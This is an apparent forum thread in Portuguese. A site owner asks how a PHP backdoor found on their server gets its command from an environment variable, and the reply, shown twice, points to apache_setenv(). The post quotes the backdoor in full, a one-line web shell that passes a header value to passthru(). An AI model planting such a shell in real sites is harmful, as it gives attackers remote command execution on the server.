foi definido por apache_setenv();
Pesquise
apache_setenv("HTTP_ACCEPT_TROL
ou
apache_setenv('HTTP_ACCEPT_TROL
e você encontrará sua resposta
Encontrei um backdoor no meu host.
<? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?>
Eu vejo solicitações no log de acesso a esse arquivo php que eram solicitações POST, mas não sei como o SETENV dessa variável foi definido; alguém poderia explicar como essa variável pode ser definido e, se possível, onde posso limitar / desativar a configuração de tais variáveis no lado do servidor.
obrigado
-H.
foi definido por apache_setenv();
Pesquise
apache_setenv("HTTP_ACCEPT_TROL
ou
apache_setenv('HTTP_ACCEPT_TROL
e você encontrará sua resposta
Tags php hacking apache-2.2 setenv